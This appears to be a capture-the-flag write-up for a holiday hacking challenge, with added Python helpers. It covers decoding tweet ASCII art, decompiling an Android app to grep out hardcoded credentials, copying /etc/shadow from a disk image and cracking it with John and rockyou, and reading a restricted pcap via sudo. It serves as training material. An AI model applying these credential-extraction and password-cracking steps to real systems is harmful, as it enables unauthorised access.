JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ
NORTHPOLEJOYHOHOHOF.............."????????????????4PEACEONEARTHQQWHOHOHOELF
HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ
HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH
JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF
GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY
NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF
ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ
HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ
PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY
JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY
ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ
HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ
CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ
HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF
NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ
JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY
JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO
NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ
HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ
HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ
SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO
SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY
ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ
PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ
ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY
CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ
JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ
JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF
SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF
HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA
PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ
CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ
NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO
JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH
NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF
HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ
NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ
ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO
SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH
ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ
JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY
PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ
SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ
ELFJOYCHRISTMASNORTHPOLEWPEACEONEARTHNORTHPOLEQ@^.]HOHOHOHOHOHOELFCHRISTMAS
HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY
CHRISTMASJOYPEACEONEARTHJOYSANTAQWCHRISTMASQ@"....]JOYGOODWILLTOWARDSMENJOY
GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF
ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW".......]PEACEONEARTHELFQQWELFWQQ
GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ
CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW"..........]GOODWILLTOWARDSMENELFELF
JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO
PEACEONEARTHGOODWILLTOWARDSMENWJOYQW".............]HOHOHOHOHOHONORTHPOLEJOY
ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ
NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF
JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO
GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY
NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ
GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ
NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY
ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ
NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ
GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ
PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ
HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH
JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ
NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ
NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS
PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ
ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ
PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF
CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ
NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ
GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY
ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY
NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY
CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ
ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY
CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ
PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ
PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH
NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ
JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
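The wall of text above is a picture drawn one tweet per row: the '.' characters are the light area that forms the strokes, and the filler words (SANTA, ELF, HOHOHO, ...) with their Q/W padding are the dark background. Because each tweet is one row, the letters lie on their side. The following script is an added example (not part of the original post or of the challenge); it assumes the tweetout.txt written by the script above, binarizes each row and rotates the result 90 degrees counter-clockwise (the orientation I worked out from reading the art) so the word can be read off directly.

```python
"""Reveal the picture hidden in the @santawclaus tweet dump (added example)."""
import sys

INK, BLANK = "#", " "


def binarize(row: str) -> str:
    """Map the light area ('.') to INK and everything else (words, padding) to BLANK."""
    return "".join(INK if ch == "." else BLANK for ch in row)


def rotate_ccw(rows):
    """Rotate a list of strings 90 degrees counter-clockwise.

    Output line i is column (width-1-i) of the input read top to bottom,
    so the right-hand edge of the tweet grid becomes the first output line.
    """
    width = max(len(r) for r in rows)
    padded = [r.ljust(width) for r in rows]
    return ["".join(r[c] for r in padded) for c in range(width - 1, -1, -1)]


def render(rows):
    """Binarize every tweet row, rotate, and drop output lines that carry no ink."""
    art = rotate_ccw([binarize(r) for r in rows])
    return [line.rstrip() for line in art if INK in line]


if __name__ == "__main__":
    # Assumed input file: the tweetout.txt produced by the Twython script above.
    path = sys.argv[1] if len(sys.argv) > 1 else "tweetout.txt"
    with open(path, encoding="utf-8") as fh:
        tweets = [ln.rstrip("\n") for ln in fh if ln.strip()]
    print("\n".join(render(tweets)))
```

Run it as `python3 reveal.py tweetout.txt`; the repeated boundary tweets that the inclusive max_id produces only widen a stroke by a column, so they do not hurt readability.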

Answer: BUGBOUNTY

For this we look at the Instagram account. We spot a picture of a very untidy desk. Looking a little closer, there are a few things of interest that can help us identify the zip file.


A zip name and a domain name: http://northpolewonderland.com/SantaGram_v4.2.zip. We can use the password bugbounty we got from the previous question to unlock the zip, and we get:

  • APK file.

For this we need to decompile the APK back into something resembling source code so we can look through it.

The clues from the characters walking around the North Pole suggested apktool, which sounds like a good idea to me. Follow the install guide at https://ibotpeaches.github.io/Apktool/install/

[email protected]:~/SANS$ apktool d SantaGram_4.2.apk
I: Using Apktool 2.2.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/thehermit/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
[email protected]:~/SANS$

I now have a folder with all the decompiled source code, and there's a lot of it. Grep is going to be my friend here. I'm looking for usernames and passwords, so let's start there.

egrep -r -A2 'username|password' SantaGram_4.2

This command tells grep to use extended regular expressions, to search for 'username' OR 'password', and to read all files recursively in the SantaGram_4.2 folder, which is where all our source is now stored. The -A2 tells grep to also display the 2 lines after each match. This is because in smali the variable name is set on one line and the value is stored on a line shortly after it (with a blank line in between, as the output shows), so two lines of context are enough to see both.

. . . 

SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali:    const-string v1, "username"
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-    const-string v2, "guest"
--
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali:    const-string v1, "password"
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-
SantaGram_4.2/smali/com/northpolewonderland/santagram/SplashScreen.smali-    const-string v2, "busyreindeer78"

. . .

That looks like our answer

  • Username = guest
  • password = busyreindeer78
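The -A2 trick works because apktool lays the key and the value down as neighbouring const-string instructions. The following script, added here as an example and not part of the original write-up, automates that pairing across a whole decoded tree: it collects every const-string in a .smali file and reports any key-like literal (username, password, token and so on) whose next literal is loaded into a different register. The SAMPLE_SMALI excerpt is constructed to mirror the SplashScreen.smali hit above; the key list and the three-instruction window are my own choices and will need tuning for other apps.

```python
import os
import re
import sys
from typing import Iterator, List, Tuple

# Constructed excerpt modelled on the SplashScreen.smali hit: apktool emits the
# key and the value as consecutive const-string instructions feeding a put() call.
SAMPLE_SMALI = '''
.method private sendCredentials()V
    .locals 3
    new-instance v0, Lorg/json/JSONObject;
    invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
    const-string v1, "username"

    const-string v2, "guest"
    invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
    const-string v1, "password"

    const-string v2, "busyreindeer78"
    invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
    const-string v1, "debug"
    const-string v2, "true"
    return-void
.end method
'''

# Key names worth a second look; extend this for the app under test (assumption).
KEY_RE = re.compile(r'^(?:user(?:name)?|pass(?:word|wd)?|secret|token|api[_-]?key)$', re.I)
# const-string and const-string/jumbo both load a string literal into a register.
CONST_STRING_RE = re.compile(r'^\s*const-string(?:/jumbo)?\s+([vp]\d+),\s*"((?:[^"\\]|\\.)*)"')


def const_strings(smali: str) -> Iterator[Tuple[int, str, str]]:
    """Yield (line_no, register, literal) for every const-string in a smali file."""
    for no, line in enumerate(smali.splitlines(), 1):
        m = CONST_STRING_RE.match(line)
        if m:
            yield no, m.group(1), m.group(2)


def credential_pairs(smali: str, window: int = 3) -> List[Tuple[str, str, int]]:
    """Return (key, value, line_no) where a key-like literal is followed, within
    `window` const-string instructions, by a literal loaded into a different
    register. Heuristic: it catches the key/value pattern of map/JSON put() calls
    and misses secrets built at runtime or stored in resources."""
    consts = list(const_strings(smali))
    hits = []
    for i, (no, reg, val) in enumerate(consts):
        if not KEY_RE.match(val):
            continue
        for _, reg2, val2 in consts[i + 1:i + 1 + window]:
            if reg2 != reg:  # value goes into a second register, key stays in the first
                hits.append((val, val2, no))
                break
    return hits


def scan_tree(root: str) -> List[Tuple[str, str, str, int]]:
    """Run credential_pairs over every .smali file under an apktool output dir."""
    out = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith('.smali'):
                path = os.path.join(dirpath, name)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    for key, val, no in credential_pairs(fh.read()):
                        out.append((path, key, val, no))
    return out


if __name__ == '__main__':
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])           # e.g. SantaGram_4.2/smali
    else:
        results = [('<sample>', k, v, n) for k, v, n in credential_pairs(SAMPLE_SMALI)]
    for path, key, val, no in results:
        print(f'{path}:{no}: {key} = {val!r}')
```

Run it with the path to the smali directory; with no argument it scans the built-in excerpt. Because it only pairs literals, check each hit in the surrounding smali before treating it as a credential.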

We are looking for an audio file, so let's search for MP3s.

$ find SantaGram_4.2/ -type f -name '*.mp3'
SantaGram_4.2/res/raw/discombobulatedaudio1.mp3

This tells find to look recursively through the SantaGram_4.2 directory and list every regular file whose name matches *.mp3. The pattern is quoted so the shell passes it to find rather than expanding it against the current directory first.

If the file wasn't named as an .mp3, or was some other audio format, we could run the file command over every file and keep only those detected as audio:

$ find SantaGram_4.2 -type f -exec file {} + | grep audio
SantaGram_4.2/res/raw/discombobulatedaudio1.mp3:                                            Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

One of the useful features of find is that it can run another command on each match. Here, for every regular file, it runs the Unix file command via -exec, batching file names with + rather than spawning one process per file. From there we just pipe the output into grep to filter for audio files.

Whichever way you do it, the answer is discombobulatedaudio1.mp3

Before you can answer this question you need to complete the Cranberry Pi quests and assemble your Pi; see the Quests section for more information. Once the Pi is assembled, Holly Evergreen will give you a Cranbian image to download: https://www.northpolewonderland.com/cranbian.img.zip

Once unzipped, file tells us the image is an x86 boot sector, so as expected this is a raw disk image. The easiest way to get the current password is to grab a copy of the /etc/shadow file from the image and crack the hashes.

First let's mount the image so we can grab the files we need. The image contains a whole disk rather than a single filesystem, so to mount the OS partition we first need to calculate the byte offset at which that partition starts and then pass it to mount.

$ fdisk -l cranbian-jessie.img

Disk cranbian-jessie.img: 1389 MB, 1389363200 bytes
255 heads, 63 sectors/track, 168 cylinders, total 2713600 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x5a7089a1

              Device Boot      Start         End      Blocks   Id  System
cranbian-jessie.img1            8192      137215       64512    c  W95 FAT32 (LBA)
cranbian-jessie.img2          137216     2713599     1288192   83  Linux
$

fdisk tells us there are two partitions on this image. The first (type c, FAT32) is the boot partition and the second (type 83) is the Linux OS partition. The Linux partition starts at sector 137216 and the sector size is 512 bytes. Multiplying these together gives the byte offset of the OS filesystem within the image file: 137216 × 512 = 70254592.

Then it's just a matter of mounting it (as root, hence the # prompt) and copying out the /etc/passwd and /etc/shadow files. For anything forensic, add ro to the mount options so nothing on the image gets modified.

# mkdir cranbian_mount
# mount -o loop,offset=70254592 cranbian-jessie.img cranbian_mount/
# cp cranbian_mount/etc/passwd .
# cp cranbian_mount/etc/shadow .
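Doing the offset arithmetic by hand is fine for one image, but it is easy to get wrong, and the kernel will happily mount garbage at the wrong offset. Here, as an added example rather than anything from the original post, is a Python script that reads sector 0 of an image, parses the classic MBR partition table directly and emits the mount commands. The SAMPLE_MBR bytes are constructed to reproduce the table fdisk printed above, so the script can be checked without the image. It handles only the four primary MBR entries and refuses GPT disks and anything without the 0x55AA signature; extended partitions (types 0x05/0x0F) would need their own walk.

```python
import struct
import sys
from typing import List, NamedTuple

SECTOR = 512  # logical sector size, as fdisk reported for this image


class Partition(NamedTuple):
    index: int       # 1-based, matching cranbian-jessie.img1 / img2
    type_id: int     # MBR type byte: 0x0c = W95 FAT32 (LBA), 0x83 = Linux
    bootable: bool
    start_lba: int
    sectors: int

    @property
    def byte_offset(self) -> int:
        return self.start_lba * SECTOR

    @property
    def byte_size(self) -> int:
        return self.sectors * SECTOR


def parse_mbr(sector0: bytes) -> List[Partition]:
    """Parse the four primary entries of a classic MBR. Each 16-byte entry at
    offset 446 + 16*i holds: status, CHS start (3 bytes), type, CHS end (3),
    LBA start (u32 LE), sector count (u32 LE). Bytes 510..511 must be 55 AA."""
    if len(sector0) < SECTOR or sector0[510:512] != b'\x55\xaa':
        raise ValueError('no 0x55AA signature: not an MBR disk image')
    parts = []
    for i in range(4):
        entry = sector0[446 + 16 * i:446 + 16 * (i + 1)]
        status, _chs_start, type_id, _chs_end, lba, count = struct.unpack('<B3sB3sII', entry)
        if type_id == 0xEE:
            raise ValueError('protective MBR: this is a GPT disk, parse the GPT instead')
        if type_id == 0x00 or count == 0:
            continue  # unused slot
        parts.append(Partition(i + 1, type_id, bool(status & 0x80), lba, count))
    return parts


def mount_commands(image: str, parts: List[Partition]) -> List[str]:
    """Read-only loop mounts. offset= is what the kernel needs; sizelimit= stops a
    read from running past the end of this partition into the next one."""
    return [f'mount -o ro,loop,offset={p.byte_offset},sizelimit={p.byte_size} '
            f'{image} /mnt/p{p.index}' for p in parts]


def read_mbr(path: str) -> bytes:
    with open(path, 'rb') as f:
        return f.read(SECTOR)


def _entry(status: int, type_id: int, lba: int, count: int) -> bytes:
    return struct.pack('<B3sB3sII', status, b'\0\0\0', type_id, b'\0\0\0', lba, count)


# Constructed sector 0 reproducing the fdisk table above: img1 type 0x0c, sectors
# 8192..137215; img2 type 0x83, sectors 137216..2713599; two empty slots.
SAMPLE_MBR = (b'\0' * 446
              + _entry(0x00, 0x0c, 8192, 137215 - 8192 + 1)
              + _entry(0x00, 0x83, 137216, 2713599 - 137216 + 1)
              + _entry(0, 0, 0, 0) * 2
              + b'\x55\xaa')

if __name__ == '__main__':
    image = sys.argv[1] if len(sys.argv) > 1 else 'cranbian-jessie.img'
    table = parse_mbr(read_mbr(image)) if len(sys.argv) > 1 else parse_mbr(SAMPLE_MBR)
    for p in table:
        print(f'{image}{p.index}: type 0x{p.type_id:02x} start {p.start_lba} '
              f'offset {p.byte_offset} size {p.byte_size}')
    for cmd in mount_commands(image, table):
        print(cmd)
```

On a current util-linux system, losetup -rfP cranbian-jessie.img attaches the image read-only and creates per-partition device nodes (/dev/loopNp1, /dev/loopNp2), which sidesteps the offset calculation entirely; the manual method is what you fall back on when partition scanning is unavailable.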

We have the hash for the cranpi account. Every other account has * in the hash field, which means no password login is possible for it, so there is exactly one hash to crack.

root:*:17067:0:99999:7:::
daemon:*:17067:0:99999:7:::
bin:*:17067:0:99999:7:::
sys:*:17067:0:99999:7:::
sync:*:17067:0:99999:7:::
games:*:17067:0:99999:7:::
man:*:17067:0:99999:7:::
lp:*:17067:0:99999:7:::
mail:*:17067:0:99999:7:::
news:*:17067:0:99999:7:::
uucp:*:17067:0:99999:7:::
proxy:*:17067:0:99999:7:::
www-data:*:17067:0:99999:7:::
backup:*:17067:0:99999:7:::
list:*:17067:0:99999:7:::
irc:*:17067:0:99999:7:::
gnats:*:17067:0:99999:7:::
nobody:*:17067:0:99999:7:::
systemd-timesync:*:17067:0:99999:7:::
systemd-network:*:17067:0:99999:7:::
systemd-resolve:*:17067:0:99999:7:::
systemd-bus-proxy:*:17067:0:99999:7:::
messagebus:*:17067:0:99999:7:::
avahi:*:17067:0:99999:7:::
ntp:*:17067:0:99999:7:::
sshd:*:17067:0:99999:7:::
statd:*:17067:0:99999:7:::
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

Now it's time to get cracking. Another elf in the North Pole suggested the rockyou word list, which is included in Kali, would be a good choice. John wants the passwd and shadow entries merged into one file (the unshadow utility that ships with John does exactly this); combined.txt is that merged file.

# john --wordlist=/usr/share/wordlists/rockyou.txt --fork=4 combined.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status

It doesn’t take long before our password is cracked.

# john combined.txt --show
cranpi:yummycookies:1000:1000:,,,:/home/cranpi:/bin/bash

1 password hash cracked, 0 left
#

Answer: yummycookies
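Before pointing john at anything it is worth triaging what shadow actually contains: most of the entries above have * in the password field, so there is exactly one hash to crack, and john wants passwd and shadow merged so that --show can print the account details alongside the password. The script below is an added example, not part of the original write-up or of John the Ripper: it classifies each shadow entry by its crypt(5) identifier and reproduces what unshadow does. The shadow lines are a subset of those shown above; SAMPLE_PASSWD is constructed to match the --show output (uid 1000, /home/cranpi, /bin/bash).

```python
import re
import sys
from typing import Dict, List, NamedTuple, Optional

# crypt(5) identifiers seen in the hash field of /etc/shadow.
ALGOS = {'1': 'md5crypt', '2a': 'bcrypt', '2b': 'bcrypt', '2y': 'bcrypt',
         '5': 'sha256crypt', '6': 'sha512crypt', '7': 'scrypt', 'y': 'yescrypt'}


class ShadowEntry(NamedTuple):
    user: str
    hash: str
    algo: Optional[str]   # None when the field is '*', '!' or empty (no password login)
    salt: Optional[str]   # only extracted for md5/sha256/sha512crypt


def parse_shadow_line(line: str) -> Optional[ShadowEntry]:
    fields = line.rstrip('\n').split(':')
    if len(fields) < 2 or not fields[0]:
        return None
    user, h = fields[0], fields[1]
    if h in ('', '*') or h.startswith('!'):
        return ShadowEntry(user, h, None, None)          # locked or passwordless: nothing to crack
    m = re.match(r'^\$([^$]+)\$(.*)$', h)
    if not m:
        # 13-character field with no '$' prefix is traditional DES crypt.
        return ShadowEntry(user, h, 'descrypt' if len(h) == 13 else 'unknown', None)
    ident, rest = m.group(1), m.group(2)
    salt = None
    if ident in ('1', '5', '6'):
        rest = re.sub(r'^rounds=\d+\$', '', rest)       # optional rounds=N$ prefix
        salt = rest.split('$', 1)[0]
    return ShadowEntry(user, h, ALGOS.get(ident, f'unknown(${ident}$)'), salt)


def crackable(shadow_text: str) -> List[ShadowEntry]:
    """Accounts that carry a real password hash worth feeding to john or hashcat."""
    entries = (parse_shadow_line(l) for l in shadow_text.splitlines())
    return [e for e in entries if e and e.algo]


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Merge like john's unshadow(8): the 'x' in passwd's password field is
    replaced by the hash from shadow, so --show can print uid/gid/home/shell."""
    hashes: Dict[str, str] = {}
    for line in shadow_text.splitlines():
        e = parse_shadow_line(line)
        if e:
            hashes[e.user] = e.hash
    merged = []
    for line in passwd_text.splitlines():
        f = line.split(':')
        if len(f) >= 7 and f[0] in hashes:
            f[1] = hashes[f[0]]
        merged.append(':'.join(f))
    return '\n'.join(merged) + '\n'


# Subset of the shadow file copied out of the image above.
SAMPLE_SHADOW = '''root:*:17067:0:99999:7:::
daemon:*:17067:0:99999:7:::
www-data:*:17067:0:99999:7:::
sshd:*:17067:0:99999:7:::
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::
'''

# Constructed passwd lines consistent with the john --show output above.
SAMPLE_PASSWD = '''root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
cranpi:x:1000:1000:,,,:/home/cranpi:/bin/bash
'''

if __name__ == '__main__':
    if len(sys.argv) == 3:
        passwd_text, shadow_text = (open(p).read() for p in sys.argv[1:3])
    else:
        passwd_text, shadow_text = SAMPLE_PASSWD, SAMPLE_SHADOW
    for e in crackable(shadow_text):
        print(f'{e.user}: {e.algo} salt={e.salt}', file=sys.stderr)
    sys.stdout.write(unshadow(passwd_text, shadow_text))   # this is your combined.txt
```

Usage: python3 unshadow_triage.py passwd shadow > combined.txt. The per-account summary on stderr tells you which john --format to expect and roughly how expensive the crack will be (sha512crypt with default rounds is far slower per guess than md5crypt, which is why rockyou rather than brute force was the right call here).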

Now we have completed the Cranberry Pi achievements we can access the terminals in the North Pole. There are 5 terminals and you can use the maps at the end of this post to figure out where each one is located.

When you first load the terminal you are presented with the following.

Seems simple enough: let's run tcpdump against /out.pcap and see what we have.

$ tcpdump -r out.pcap
tcpdump: out.pcap: Permission denied
$

OK, not that simple then. Let's have a look at the permissions on the pcap file.

$ ls -ahtl /out.pcap
-r-------- 1 itchy itchy 1.1M Dec  2 15:05 /out.pcap

It seems itchy is the only user who can read the file, so we need to become itchy. Let's try a few ways to run tcpdump as itchy.

$ su - itchy -c tcpdump /out.pcap
Password:

That's not going to work without itchy's password.

$ sudo -u itchy tcpdump -r /out.pcap
sudo: unable to resolve host f104dddd0fc6
reading from file out.pcap, link-type EN10MB (Ethernet)
11:28:00.520764 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [S], seq 2857348850, win 
65535, options [mss 1460,nop,wscale 5,nop,nop,TS val 2773686863 ecr 0,sackOK,eol], length 0
11:28:00.520829 IP 192.168.188.130.http > 192.168.188.1.52102: Flags [S.], seq 2484589859, ack
 2857348851, win 28960, options [mss 1460,sackOK,TS val 638274 ecr 2773686863,nop,wscale 7], l
ength 0
11:28:00.520967 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [.], ack 1, win 4117, opt
ions [nop,nop,TS val 2773686863 ecr 638274], length 0
11:28:00.521004 IP 192.168.188.1.52102 > 192.168.188.130.http: Flags [P.], seq 1:160, ack 1, w
in 4117, options [nop,nop,TS val 2773686863 ecr 638274], length 159
11:28:00.521010 IP 192.168.188.130.http > 192.168.188.1.52102: Flags [.], ack 160, win 235, op
tions [nop,nop,TS val 638274 ecr 2773686863], length 0

